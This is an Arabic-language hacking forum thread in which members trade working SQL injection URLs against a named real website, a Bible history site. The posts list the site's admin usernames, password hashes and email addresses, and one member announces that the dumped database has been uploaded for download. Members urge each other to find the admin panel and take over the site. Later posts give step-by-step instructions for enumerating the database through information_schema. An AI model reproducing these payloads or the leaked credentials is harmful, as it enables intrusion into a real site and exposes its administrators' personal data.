:: vBspiders Professional Network :: - موقع مصاب - اصدار قاعدة البيانات 5

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)

- - موقع مصاب - اصدار قاعدة البيانات 5 (http://www.vbspiders.com/vb/t32683.html)

موقع مصاب - اصدار قاعدة البيانات 5

[align=center]السلام عليكم

الموقع مجرب و الثغرة ناجحة 100/100 و أنا لم أرد وضع اليوزر و الباسوورد حتى يتدرب عليه المبتدئين

[hide]http://www.bible-history.com/subcat.php?id=-23%20union%20select%20version%28%29[/hide]

بالتوفيق[/align]

جاء في وقته

حلو بتعلم عليه

تسلم ايدك..

:)

[align=center]الله يبارك فيك [/align]

[align=center]شكرا على المرور شباب

ان شاء الله ستكون هناك مواقع جديدة[/align]

[align=center][/align]بارك الله فيك في ميزان حسناتك باذن الله
تحياتي

تفضلو يا إخواني :666:

كود PHP:

   http://www.bible-history.com/subcat.php?id=-23+union+select+concat(user_name,0x3e,user_pass,0x3e,user_email)+from+bho_board_users--

اقتباس:

المشاركة الأصلية كتبت بواسطة Azar36.exe (المشاركة 174334)

تفضلو يا إخواني :666:

كود PHP:

   http://www.bible-history.com/subcat.php?id=-23+union+select+concat(user_name,0x3e,user_pass,0x3e,user_email)+from+bho_board_users--

[align=center][/align]حبيبي مشكور بارك الله فيك لكن انا الان جربت حقن الموقع من جديد وطلع معاي معلومات غير شكل

طلع اليوزر : jc
وطلع الباسورد : mos3s

[align=center][/align]انا لو معاي لوحة التحكم كنت جربت ادخل فيه حتى اتاكد اي واحد الصح بس للاسف ما لقيتها..
الي يلقي لوحة التحكم يدخل ويجرب وحلال عليه الموقع ^_^
تحياتي

أضف الأمر ID لتعرف أيهما الأول

هذا اليوز الذي إكتشفته يحمل رقم 3 لاكن ماذام الموقع ليس مفتوح التسجيل إذن كلهم من الإذارة

كود PHP:

   http://www.bible-history.com/subcat.php?id=-23+union+select+concat(user_id,0x3e,user_name,0x3e,user_pass,0x3e,user_email)+from+bho_board_users--

[align=center][/align]

الان سحبت قاعدة البانات كلها ^_^

وكلامك صحيح ما في اي اعضاء فقط ادارة وهما ثلاثة وعلى الترتيب هيك :
1-admin
2-jc
3-rusty

والباس لكل واحد على الترتيب :

1-a1fba67e72b37d0ba83c2cc937172ec8eb1fda6d
2-b404bbb52c91fe1f291ba9c2719aa7d916dc55e5
3-3a5fbfe524ec4319455769d5462eb2c4ac4cbe79

راح احاول افك التشفير باذن الله...

ايميلاتهم كمان على الترتيب :
1-jim@bible-history.com
2-jim@wanned.com
3-rusty@bible-history.com

عملت سيف لقاعدة البيانات ورفعتها...حملوها وحصلو رابط لوحة التحكم وحلال عليكم الموقع ^_^

لتحميل القاعدة من هنا :
http://www.multiupload.com/QK98XDX9WT

[align=center]Master vbspiders
-------------------

بارك الله فيك عزيزي[/align]

جاري التجربة يا ولد البلاد

يا وليد بلادي قولي وعلاه الأمر +from+information_schema+columns
مايمشيش في الموقع ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
و أنا جربت نزع علامة الزائد و كذلك نفس الخال
http://www.bible-history.com/subcat.php?id=-23 union select version()+from+information_schema+columns

[align=center]

اقتباس:

المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo (المشاركة 174481)

أهلا أخي ... أنظر

ذلك الأمر لا يوضع لوحده

اليك الخطوات ... أفترض أنك تعرف استخراج الاصدار

بعدها ستضيع هذا الأمر في الأخير

from+information_schema.columns+where+column_name+ LIKE+CHAR(37, 112, 97, 115, 37)

و تضع الأمر التالي في مكان أحد الأعمدة المصابة

concat(table_name,0x3a,column_name,0x3a,table_sche ma)

فيصبح الرابط للموقع الذي وضعته أنا كالتالي

http://www.bible-history.com/subcat....20115,%2037%29

سيظهرلك هذا السطر

bho_board_users:user_newpassword:bible_history

و أظن أنك تعرف كيف تكمل

على العموم ان واجهتك مشكلة ضعها هنا[/align]